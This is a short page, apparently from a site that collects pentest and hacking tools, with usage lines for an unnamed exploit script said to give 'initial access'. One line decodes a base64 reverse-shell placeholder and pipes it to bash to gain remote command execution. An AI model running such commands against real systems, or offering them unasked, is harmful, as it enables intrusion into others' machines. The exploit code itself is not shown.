Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!
Discover the most used tools by our community.
Explore all tools
Browse our collection of tools
This script will get you initial access. First, Install required modules using pip
pip3 install -r requirements.txt
python3 exploit.py 'id'
or
python3 exploit.py 'echo BASE64_ENCODED_REVSHELL | base64 -d | bash'